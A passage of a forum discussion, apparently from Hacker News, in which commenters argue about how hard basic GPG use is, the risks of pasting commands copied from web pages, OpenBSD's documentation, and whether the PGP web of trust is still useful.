Are you really confident that cutting and pasting crap from a random web page (particularly one without TLS, so the guy sitting across from you at Starbucks can MITM it) provides you with sufficient understanding to notice when you are accidentally doing something insecure?
I cross-referenced it against the documentation. Let's assume someone won't, though. The commands' appearance make their intent pretty obvious. Further, using them produces output that confirms what the cheat sheet says. For instance, adding a public key said something along the lines of "public key added." Decrypting the incoming message showed its plaintext. Encrypting outgoing plaintext turned it into ciphertext other party decrypted. Along with a warning that the key didn't have others' signatures on it, which ironically re-assured me more because it shouldn't.
So, a visual inspection of the commands and their results in a sandboxed machine was about all one needed to know that they worked. My experience with similar tools helps there. More concerned people can thoroughly cross-reference them with the documentation, source code, program's author, and so on. Whatever level of assurance they like. The basic level, though, was incredibly simple.
I'd take using GPG over learning Emacs or OpenBSD any day. In level of difficulty, that is.
The problem with copying and pasting from a website is not whether you think you know what the command does. It is that copying from a HTML page might contain stuff you can see.
Damn! That was a surprise! Alright, point taken. I'll... have to validate things on terminals a lot more thoroughly in the future. And type my own code by hand based on the documentation. Maybe just make my own cheat-sheets for the cut and paste. Text files.
Agree with regard to Emacs, but OpenBSD has some of the best technical documentation I've ever come across. For example, their networking FAQ[0] or (especially) the PF guide[1].
Their documentation is great. I won't disagree in the slightest. I also praised them in other places for working as hard on docs as software itself. Docs are lacking in most places. The only point of these comments is that people are way overhyping the difficulty of basic GPG use given I installed it easily using Google and used it by cut n pasting a cheat sheet. Others have too. That's all I'm trying to do here while using things like the overall OpenBSD experience (or Emacs) as points of comparison to support that.
I'd have to use my brain with either OpenBSD stuff or Emacs. Of course, I cheated there too: Absolute OpenBSD. I know I could've used their great docs for everything but the reviews of the book were too good. I had to attempt using it to shortcut the learning process. Lol.
There's a good reason for that, actually. Besides, it doesn't matter how long ago I went to key-signing parties and such. The number of people I know using PGP I can count on one hand, maybe two. I have reliable channels to them to get keys. Web of trust is useless to me and despite my poor memory I can remember debating people about its many weaknesses even back when we did it a lot.
Modern tech has moved on to more interesting and reliable reputation systems. Web of trust's time has passed, for now.
Lost much of my memory in an accident where I took severe head injury. What my brain kept it kept. What it didn't it didn't. Most stuff I hadn't used in forever went poof. Web of trust model was one of those. Some things I'd just have to straight up relearn and I'm not bothering unless I have a need given only so much memory to spare.
I'm not trying to insult anyone, it's a mere statement of a fact - the OP hasn't a slightest clue about web of trust, subkeys, key-signing, etc. and he clearly demonstrated it in several comments. In those he spreads misinformation and FUD - and those are signs of a troll. So if I say "you haven't a slightest clue" to such an individual, I'm being polite.
